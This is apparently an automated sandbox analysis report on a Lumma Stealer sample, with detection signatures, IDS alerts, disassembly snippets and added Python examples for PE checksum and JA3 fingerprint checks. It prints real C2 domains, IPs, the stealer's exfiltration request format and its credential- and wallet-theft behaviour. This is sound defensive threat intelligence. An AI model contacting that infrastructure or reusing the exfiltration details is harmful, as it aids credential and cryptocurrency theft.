
Windows Analysis Report
Installer.exe

Overview

General Information

Sample name: Installer.exe
Analysis ID: 1581507
MD5: 0cebf27d0066d6ea5653547254e236e4
SHA1: badfc5a68c17d2d1112e50ccd8ececeb4f8ba8a9
SHA256: 21d9bba7ae0dfb0892e5345ee42d73e241e0d9841a17ff340f6278e86d8f54f4
Tags: exe, LummaStealer, signed, user-ventoy

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
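Two of the static findings above, "PE file contains an invalid checksum" and "PE / OLE file has an invalid certificate", are worth separating, because one does not imply the other. The checksum is the linker-written IMAGE_OPTIONAL_HEADER.CheckSum field, and the following is an added example (not part of the Joe Sandbox report, and not run against this sample) that recomputes it with the documented algorithm, the same one imagehlp's CheckSumMappedFile uses, over a constructed minimal PE32 header. The PE image, the 0xCC filler standing in for section data, and all function names are assumptions made for the demonstration.

```python
import struct

# Offset of the CheckSum field inside the optional header (same for PE32 and PE32+).
OPT_HDR_CHECKSUM_OFFSET = 64


def checksum_field_offset(data: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum, located via e_lfanew."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # "PE\0\0" (4) + IMAGE_FILE_HEADER (20) + offset inside IMAGE_OPTIONAL_HEADER
    return e_lfanew + 4 + 20 + OPT_HDR_CHECKSUM_OFFSET


def pe_checksum(data: bytes) -> int:
    """Sum every little-endian dword except the CheckSum field itself, folding
    carries, then fold to 16 bits and add the file size (the documented algorithm)."""
    skip = checksum_field_offset(data)
    padded = data + b"\0" * (-len(data) % 4)      # the sum runs over whole dwords
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    total &= 0xFFFF
    return total + len(data)


def stored_checksum(data: bytes) -> int:
    return struct.unpack_from("<I", data, checksum_field_offset(data))[0]


def with_checksum(data: bytes, value: int) -> bytes:
    """Return a copy of the image with the CheckSum field set to value."""
    off = checksum_field_offset(data)
    return data[:off] + struct.pack("<I", value) + data[off + 4:]


def classify_checksum(data: bytes) -> str:
    """'unset' (field is 0, which many linkers leave), 'valid' or 'invalid'."""
    stored = stored_checksum(data)
    if stored == 0:
        return "unset"
    return "valid" if stored == pe_checksum(data) else "invalid"


def build_minimal_pe32() -> bytes:
    """Constructed PE32 skeleton: DOS header, COFF header with no sections, a zeroed
    optional header, and 64 filler bytes standing in for section data."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                           # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 0xE0, 0x0102)    # i386, PE32 opt hdr, EXECUTABLE|32BIT
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                              # PE32 magic
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + b"\xCC" * 64


if __name__ == "__main__":
    image = build_minimal_pe32()
    print("fresh image:   ", classify_checksum(image))                 # unset
    linked = with_checksum(image, pe_checksum(image))
    print("after linking: ", classify_checksum(linked))                # valid
    patched = linked[:-1] + b"\xCD"                                    # one byte changed after linking
    print("after patching:", classify_checksum(patched))               # invalid
```

A zero field is not a mismatch: the loader only enforces the checksum for drivers and for DLLs loaded at boot or into critical processes, so user-mode installers routinely ship with 0. A non-zero mismatch means bytes changed after the linker wrote the field, which is what packing, stub patching or an appended overlay does. The CheckSum field is excluded from the Authenticode hash, so a bad checksum says nothing about the signature; checking the certificate needs the security data directory, which this snippet does not parse.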

Classification

  • System is w10x64
  • Installer.exe (PID: 7424 cmdline: "C:\Users\user\Desktop\Installer.exe" MD5: 0CEBF27D0066D6EA5653547254E236E4)
    • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Installer.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\Installer.exe" MD5: 0CEBF27D0066D6EA5653547254E236E4)
    • Installer.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\Installer.exe" MD5: 0CEBF27D0066D6EA5653547254E236E4)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware configuration (LummaC):
{"C2 url": ["rebuildeso.buzz", "mindhandru.buzz", "screwamusresz.buzz", "hummskitnj.buzz", "prisonyfork.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "inherineau.buzz", "scentniej.buzz"], "Build id": "yau6Na--5223198671"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author
00000003.00000003.1835675481.00000000035AD000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000003.1835591588.00000000035AD000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000003.1835776038.00000000035AD000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(7 further entries omitted from this extract)
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T23:13:25.610456+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 23.55.153.106 | 443 | TCP
2024-12-27T23:13:28.309145+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:30.378308+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49736 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:32.784606+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:35.188581+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49738 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:37.425413+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49739 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:40.144074+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:42.627339+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:46.299504+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49747 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:29.065912+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49735 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:31.195519+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:47.067796+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49747 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:29.065912+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49735 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:31.195519+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:40.950937+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:26.465709+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49734 | 23.55.153.106 | 443 | TCP
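The nine severity-3 rows (SID 2028371) are JA3 alerts: the rule matched the MD5 of the client's ClientHello parameters (the fingerprint the Networking section reports as a0e9f5d64349fb13191bc781f81f42e1), not anything Lumma-specific. A JA3 hash identifies a TLS client stack rather than a family, which is why the rule name refers to an unrelated campaign and why it is only corroborating evidence next to the severity-1 Lumma rules. The following added example (not from the Joe Sandbox report) shows what goes into the hash: it parses a ClientHello, drops GREASE values, builds the JA3 string and hashes it. The ClientHello is constructed here; the report does not include the sample's actual ClientHello bytes, so this does not reproduce the a0e9f5d6... value.

```python
import hashlib

# RFC 8701 GREASE values: JA3 strips them from ciphers, extensions and curves.
GREASE = {0x0A0A, 0x1A1A, 0x2A2A, 0x3A3A, 0x4A4A, 0x5A5A, 0x6A6A, 0x7A7A,
          0x8A8A, 0x9A9A, 0xAAAA, 0xBABA, 0xCACA, 0xDADA, 0xEAEA, 0xFAFA}


def _u16(b: bytes, off: int) -> int:
    return int.from_bytes(b[off:off + 2], "big")


def parse_client_hello(record: bytes) -> dict:
    """Extract the JA3-relevant fields from a TLS record carrying a ClientHello."""
    if record[0] != 0x16 or record[5] != 0x01:
        raise ValueError("not a handshake record carrying a ClientHello")
    hs = record[5:5 + 4 + int.from_bytes(record[6:9], "big")]
    pos = 4
    version = _u16(hs, pos); pos += 2               # client_version, not the record version
    pos += 32                                        # random
    pos += 1 + hs[pos]                               # session id
    cs_len = _u16(hs, pos); pos += 2
    ciphers = [_u16(hs, i) for i in range(pos, pos + cs_len, 2)]; pos += cs_len
    pos += 1 + hs[pos]                               # compression methods
    extensions, curves, point_formats = [], [], []
    if pos < len(hs):
        ext_end = pos + 2 + _u16(hs, pos); pos += 2
        while pos < ext_end:
            etype, elen = _u16(hs, pos), _u16(hs, pos + 2)
            body = hs[pos + 4:pos + 4 + elen]; pos += 4 + elen
            extensions.append(etype)
            if etype == 0x000A:                      # supported_groups
                curves = [_u16(body, i) for i in range(2, 2 + _u16(body, 0), 2)]
            elif etype == 0x000B:                    # ec_point_formats
                point_formats = list(body[1:1 + body[0]])
    return {"version": version, "ciphers": ciphers, "extensions": extensions,
            "curves": curves, "point_formats": point_formats}


def _join(values) -> str:
    return "-".join(str(v) for v in values if v not in GREASE)


def ja3_string(record: bytes) -> str:
    """JA3 = version,ciphers,extensions,curves,point_formats (decimal, GREASE removed)."""
    h = parse_client_hello(record)
    return ",".join([str(h["version"]), _join(h["ciphers"]), _join(h["extensions"]),
                     _join(h["curves"]), "-".join(str(f) for f in h["point_formats"])])


def ja3_hash(record: bytes) -> str:
    return hashlib.md5(ja3_string(record).encode()).hexdigest()


def build_client_hello(ciphers, extensions, version=0x0303) -> bytes:
    """Constructed ClientHello for the demonstration (fixed random, empty session id)."""
    body = version.to_bytes(2, "big") + b"\x11" * 32 + b"\x00"
    cs = b"".join(c.to_bytes(2, "big") for c in ciphers)
    body += len(cs).to_bytes(2, "big") + cs + b"\x01\x00"          # one compression method: null
    ext = b"".join(t.to_bytes(2, "big") + len(b).to_bytes(2, "big") + b for t, b in extensions)
    body += len(ext).to_bytes(2, "big") + ext
    hs = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + len(hs).to_bytes(2, "big") + hs


SNI = b"example.com"
SAMPLE_EXTENSIONS = [
    (0x3A3A, b"\x00"),                                            # GREASE extension
    (0x0000, b"\x00\x0e\x00" + len(SNI).to_bytes(2, "big") + SNI),  # server_name
    (0x000A, b"\x00\x04\x00\x1d\x00\x17"),                        # x25519, secp256r1
    (0x000B, b"\x01\x00"),                                        # uncompressed points
    (0x000D, b"\x00\x04\x04\x03\x08\x04"),                        # signature_algorithms
    (0x002B, b"\x02\x03\x04"),                                    # supported_versions: TLS 1.3
]
SAMPLE_HELLO = build_client_hello([0x2A2A, 0x1301, 0x1302, 0xC02B, 0xC02F], SAMPLE_EXTENSIONS)

if __name__ == "__main__":
    print(ja3_string(SAMPLE_HELLO))   # 771,4865-4866-49195-49199,0-10-11-13-43,29-23,0
    print(ja3_hash(SAMPLE_HELLO))
```

Two properties matter when reading a JA3 alert: GREASE values are removed, so browsers that randomise them keep a stable hash, and nothing in the string is tied to the server, so a stealer using the platform TLS stack will share its hash with legitimate software on the same Windows build. The JA3 rule confirms that all nine sessions came from the same client; the Lumma attribution comes from the other SIDs and the Yara hits, not from the hash.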


                AV Detection

Source: https://lev-tolstoi.com/apix:Z | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/$5 | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/NVmA | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/espF | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/pi.W | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apim | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/S | Avira URL Cloud: Label: malware
Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["rebuildeso.buzz", "mindhandru.buzz", "screwamusresz.buzz", "hummskitnj.buzz", "prisonyfork.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "inherineau.buzz", "scentniej.buzz"], "Build id": "yau6Na--5223198671"}
Source: Installer.exe | ReversingLabs: Detection: 34%
Source: Installer.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String decryptor: hummskitnj.buzz
Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String decryptor: cashfuzysao.buzz
Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String decryptor: appliacnesot.buzz
Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String decryptor: screwamusresz.buzz
Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String decryptor: inherineau.buzz
Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String decryptor: scentniej.buzz
Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String decryptor: rebuildeso.buzz
Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String decryptor: prisonyfork.buzz
Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String decryptor: mindhandru.buzz
Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String decryptor: yau6Na--5223198671
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00415200 CryptUnprotectData, | 3_2_00415200
Source: Installer.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: C:\Users\user\Desktop\Installer.exe | Code function: 2_2_00361F38 FindFirstFileExW, | 2_2_00361F38
Source: C:\Users\user\Desktop\Installer.exe | Code function: 2_2_00361FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose, | 2_2_00361FE9
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+0000026Dh] | 3_2_00415200
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+70h] | 3_2_00409370
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov edx, ecx | 3_2_00409370
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov word ptr [ecx], dx | 3_2_0043F39E
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h | 3_2_00440CE0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 798ECF08h | 3_2_00439490
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 11A82DE9h | 3_2_00439490
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+446E8726h] | 3_2_00441DA0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h | 3_2_00440E00
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-2DC31920h] | 3_2_00422E3F
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov edx, ecx | 3_2_00422E3F
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx edi, byte ptr [esp+edx+74842D10h] | 3_2_00422E3F
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax+0Ch] | 3_2_004396A0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx edx, byte ptr [ebx+ecx-4835D6BBh] | 3_2_0040D7CF
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov edx, ebx | 3_2_0040B79B
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then cmp word ptr [esi+eax], 0000h | 3_2_0041D050
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_0041780D
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 2DFE5A91h | 3_2_004410D0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx+2Ch] | 3_2_0042788F
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov edi, dword ptr [ebp-10h] | 3_2_0041C900
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then add ebp, dword ptr [esp+0Ch] | 3_2_0042B100
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov ecx, eax | 3_2_00427917
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then test eax, eax | 3_2_0043A120
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx eax, byte ptr [esp+ecx+338E7E12h] | 3_2_0043A120
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov ebx, eax | 3_2_00405930
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov ebp, eax | 3_2_00405930
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx eax, word ptr [ebp+00h] | 3_2_0043A9D6
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then sub edx, 01h | 3_2_004409E0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+edx] | 3_2_00426190
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx edi, byte ptr [ecx] | 3_2_0043E9B3
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx+2Ch] | 3_2_00427A3F
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx ebx, byte ptr [eax+edx] | 3_2_0041F2C0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_004292E0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+edi-535229ACh] | 3_2_004402B0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then sub edx, 01h | 3_2_004402B0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx edi, byte ptr [ecx+esi] | 3_2_00402B70
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 3_2_00436370
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov eax, ecx | 3_2_00408B00
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov byte ptr [edi], cl | 3_2_0042D306
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then jmp dword ptr [00448B7Ch] | 3_2_00428307
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx ebp, byte ptr [esp+esi-6Fh] | 3_2_004393C0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+edi-535229ACh] | 3_2_004403D0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then sub edx, 01h | 3_2_004403D0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000274h] | 3_2_0042BBE3
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000274h] | 3_2_0042BC53
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx edx, byte ptr [ebp+eax-00000258h] | 3_2_0043EC60
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov edx, ecx | 3_2_00416C77
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov byte ptr [edi], cl | 3_2_0042D4D0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx-53h] | 3_2_00419C90
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov edx, ecx | 3_2_00419C90
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov byte ptr [edi], cl | 3_2_0042D49A
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 3_2_004074A0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 3_2_004074A0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000274h] | 3_2_0042BB19
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then sub edx, 01h | 3_2_00440550
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov byte ptr [ecx], al | 3_2_0041C561
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx edi, byte ptr [esi+eax+26h] | 3_2_0041C561
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov byte ptr [edi], al | 3_2_0041C561
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx esi, byte ptr [eax] | 3_2_00426513
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov edx, ecx | 3_2_00425DEA
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 3_2_00425DEA
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then cmp dword ptr [edi+ebp*8], 385488F2h | 3_2_0043A640
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov byte ptr [edi], cl | 3_2_0042D64C
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx ecx, byte ptr [ebp+eax-38h] | 3_2_0043EE50
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 3_2_0042A660
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov edx, eax | 3_2_0041966B
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 3_2_00425E70
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then sub edx, 01h | 3_2_00440600
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], EABBD981h | 3_2_0040DE13
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_00417E1A
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov ebx, eax | 3_2_00417E1A
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then sub edx, 01h | 3_2_00440690
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+5B5F0E69h] | 3_2_004146A0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov eax, ecx | 3_2_004146A0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 3_2_004146A0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov ecx, eax | 3_2_00426EB0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov ecx, eax | 3_2_0040A770
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then push eax | 3_2_00415F19
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov ecx, edx | 3_2_004227E0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov byte ptr [eax], cl | 3_2_00416790
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then mov byte ptr [eax], cl | 3_2_00416790
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movzx edx, byte ptr [esi+ecx] | 3_2_0041E7A0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 4x nop then movsx ecx, byte ptr [edi+eax] | 3_2_0043F7B2

                Networking

Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49734 -> 23.55.153.106:443
